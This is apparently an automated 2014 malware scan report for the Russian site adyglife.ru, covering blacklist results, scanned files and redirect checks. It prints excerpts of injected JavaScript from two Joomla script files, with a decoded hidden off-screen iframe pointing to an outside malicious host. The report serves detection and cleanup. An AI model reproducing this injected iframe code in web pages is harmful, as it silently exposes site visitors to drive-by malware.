Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=adyglife.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://adyglife.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://adyglife.ru/ | 200 OK Content-Length: 31824 Content-Type: text/html | clean |
http://adyglife.ru/media/system/js/caption.js | 200 OK Content-Length: 9171 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function nerdglobus(){ var maloArticulo = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrow ...[2988 bytes skipped]... Decoded script: <iframe src=http://kukus.soundfactory-21.com/j75ekufyldy.html?mimimi style="position:absolute;left:-1399px;top:-1399px;" height="121" width="130"></iframe> | ||
http://adyglife.ru/templates/gk_twn/lib/scripts/template_scripts.js | 200 OK Content-Length: 12734 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function nerdglobus(){ var maloArticulo = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/32',' new Fx.Styles(p,{duration:350}).start({ "width":"40px", "height":"40px", "top":(fintop+120)+"px" }); (function(){p.setStyle("display","none");}).delay(350); }).delay(200); }).delay(200); }); } } function changeStyle(style){ var file = $template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk32_style',style,{duration: 200,path: "/"}); } Decoded script: <iframe src=http://kukus.soundfactory-21.com/j75ekufyldy.html?mimimi style="position:absolute;left:-1399px;top:-1399px;" height="121" width="130"></iframe> Antivirus reports:
| ||
http://userapi.com/js/api/openapi.js?45 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://adyglife.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 22674 Content-Type: text/html | clean |
http://adyglife.ru/plugins/content/joomthumbnail/gallery/highslide/highslide-with-gallery.js | 200 OK Content-Length: 47446 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js | 200 OK Content-Length: 9759 Content-Type: text/javascript | clean |
http://adyglife.ru/./ | 200 OK Content-Length: 31826 Content-Type: text/html | clean |
http://adyglife.ru/news-pictures-story | 200 OK Content-Length: 34837 Content-Type: text/html | clean |
http://adyglife.ru/job | 200 OK Content-Length: 23908 Content-Type: text/html | clean |
http://adyglife.ru/job/job-vacansy | 200 OK Content-Length: 22745 Content-Type: text/html | clean |
http://adyglife.ru/job/ | 200 OK Content-Length: 23909 Content-Type: text/html | clean |
http://adyglife.ru/job/job-resume | 200 OK Content-Length: 22739 Content-Type: text/html | clean |
http://adyglife.ru/job/job-vacancyadd | 200 OK Content-Length: 38131 Content-Type: text/html | clean |
http://adyglife.ru/job/job-resumeadd | 200 OK Content-Length: 47279 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: adyglife.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 17:10:30 GMT
Pragma: no-cache
Server: nginx/1.4.1
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 17:10:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f0ffd748ff2c9675a2f9768f36ee4afd=uencvg52ohiu2ak7f1g5fc9d95; path=/
X-Powered-By: PHP/5.3.26
GET / HTTP/1.1
Host: adyglife.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 17:10:30 GMT
Pragma: no-cache
Server: nginx/1.4.1
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 17:10:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f0ffd748ff2c9675a2f9768f36ee4afd=uencvg52ohiu2ak7f1g5fc9d95; path=/
X-Powered-By: PHP/5.3.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: adyglife.ru
Referer: http://www.google.com/search?q=adyglife.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: adyglife.ru
Referer: http://www.google.com/search?q=adyglife.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.